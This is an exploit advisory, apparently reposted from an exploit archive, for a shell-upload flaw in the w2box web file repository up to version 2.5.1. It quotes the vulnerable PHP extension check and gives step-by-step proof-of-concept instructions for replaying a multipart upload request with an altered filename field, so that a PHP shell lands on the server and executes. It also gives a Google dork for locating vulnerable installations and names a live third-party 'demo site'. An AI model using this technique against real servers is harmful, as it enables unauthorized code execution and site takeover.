w2box web 2.0 File Repository <= 2.5.1 Shell upload

# Exploit Title: [w2box: web 2.0 File Repository <= 2.5.1 Shell upload]
# Date: [28/08/2011]
# Author: [N3t.Crack3r]
# Vendor or Software Link: [http://clement.beffa.org/labs/projects/w2box/]
# Version: [<= 2.5.1]
# Category:: [ webapps]
# Google dork: [Powered by w2box, using valid xhtml & css.]
# Tested on: [Linux,Windows]
# Demo site: [http://www.eradobrasfoot.com/upload/]


===================================================================
w2box: web 2.0 File Repository <= 2.5.1 Shell upload
===================================================================

----------------------------------
    Vulnerability Code:

$filename=$file['name'];
    if (isset($_POST['filename']) && $_POST['filename']!="") $filename=$_POST['filename'];
    $filename=str_replace(" ","_",$filename);
    $filename=basename($filename);
    if (!in_array(strtolower(extname($filename)), $config['allowed_ext'])) $filename .= ".badext";


----------------------------------
    POC :

# 1 : Go to http://localhost/w2box/
# 2 : Select File GIF Format  (EG : Shell.php.gif)
# 3 : Run Live HTTP Headers and Upload
# 4 : Then Replay HTTP HEADER and Change :

Content-Disposition: form-data; name="filename"\r\n
\r\n
Shell.php.gif\r\n

TO

Content-Disposition: form-data; name="filename"\r\n
\r\n
Shell.php\r\n

.

NOW shell Should be upload as Shell.php.badext in http://localhost/w2box/data/Shell.php.badext
Shell will Run as php
.badext is ignored Auto.


Best of luck.
N3t.crack3r

Shouts : Net_Spy , Sho0ter , And all Hackw0rms Crew
www.hackw0rms.net,www.cyberhaxors.com



#  0day.today [2018-03-14]  #